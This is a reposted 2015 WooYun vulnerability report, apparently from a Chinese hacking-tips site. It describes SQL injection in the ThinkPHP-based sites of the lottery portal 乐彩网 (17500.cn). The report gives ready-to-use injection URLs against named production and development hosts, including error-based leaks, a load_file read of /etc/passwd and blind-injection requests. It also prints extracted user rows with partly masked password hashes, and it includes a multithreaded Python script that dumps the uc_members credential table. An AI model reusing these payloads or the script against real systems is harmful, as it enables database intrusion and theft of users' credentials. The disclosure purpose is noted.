记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

乐彩网SQL注入漏洞(核心DB百万用户数据/thinkphp案例)

2015-06-28 05:45

乐彩网多个站点都采用thinkphp框架开发,由于没有及时更新补丁,存在通用注入。见 WooYun: ThinkPHP框架架构上存在SQL注入 .



注入1:

code 区域
http://lebi.17500.cn/Experts/Search/index/lotid/3d.html?ename[0]=exp&ename[1]=and(select(0)from(select/**/sleep(1))v)



对应的开发测试站点:

code 区域
http://devlebi.17500.cn/Experts/Search/index/lotid/3d.html?ename[0]=exp&ename[1]=and%20updatexml(1,concat(0x7c,user(),0x7c,version()),1)



devlebi.png



load_file:

code 区域
http://devlebi.17500.cn/Experts/Search/index/lotid/3d.html?ename[0]=exp&ename[1]=and%20updatexml(1,concat(0x7c,load_file(%27/etc/passwd%27)),1)

lebi2.png



注入2: passport站

code 区域
https://passport.17500.cn/message/system/sitefrom/1.html?isread[0]=exp&isread[1]=and%200%20or%201%20limit%2023%23

https://passport.17500.cn/message/system.html?msgid=56





还有很多...

漏洞证明:

用户数据120w:

code 区域
select(count(*))from uc.uc_members: 1229581



count.png



select(group_concat(uid,0x3a,username,0x3a,password,0x3a,email,0x7c))from uc.uc_members where uid in(2,4):

code 区域
eren:d6694**************39c9f06742cc8:[email protected] :134424

小卒:e1cac8ddd3**************33aa15f:[email protected] :907316



bb.png





测试脚本: (需替换脚本中的cookie)

code 区域
#coding=utf-8

'''databases: information_schema,bbslog,cnlot2004,lottery,mysql,newlebi,performance_schema,test,uc,ucbak,uprofile'''



import sys,urllib2

import threading

from multiprocessing.dummy import Pool

from multiprocessing.dummy import Lock

from optparse import OptionParser

from urllib2 import Request,urlopen,URLError,HTTPError

import urllib





def request(URL):

user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }

req = urllib2.Request(URL, None, user_agent)



req.add_header('Cookie', 'PHPSESSID=7dsnoj0rejlv4m9dg90ures6j1')#登录后的cookie



try:

request = urllib2.urlopen(req)



except Exception:

return ''





return request.read()





def binary_sqli(left, right, index):

global result

while 1:

mid = (left + right)/2

if mid == left:

lock.acquire()

result[index-1]= chr(mid)

sys.stdout.write('\r%s' % 'data: '+''.join(result).strip('*'))

sys.stdout.flush()

lock.release()

break

payload = "(ascii(substring((select(group_concat(uid,0x3a,username,0x3a,password,0x3a,email,0x7c))from uc.uc_members where uid in(2,4)),%s,1))%%%s=ascii(substring((select(group_concat(uid,0x3a,username,0x3a,password,0x3a,email,0x7c))from uc.uc_members where uid in(2,4)),%s,1)))limit 2#" % (index, mid, index)

html = request('https://passport.17500.cn/message/system/sitefrom/1.html?isread[0]=exp&isread[1]==-1+or'+urllib.quote(payload))

verify = '2015-03-17 01:57:21'

if verify in html:

right = mid

else:

left = mid

def multi_run_wrapper(args):

return binary_sqli(*args)



if __name__ == '__main__':

result=list('*'*100)

lock=Lock()

args = []

for i in range(1,100):

args.append((32, 127, i))

pool = Pool(10)

out = pool.map(multi_run_wrapper, args)

pool.close()

pool.join()

output = open('result.txt', 'w')

output.write(''.join(result))

output.close()

修复方案:

升级thinkphp.

上个靠谱点的WAF.

知识来源: www.wooyun.org/bugs/wooyun-2015-0113949

阅读:102104 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“乐彩网SQL注入漏洞(核心DB百万用户数据/thinkphp案例)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云

本页关键词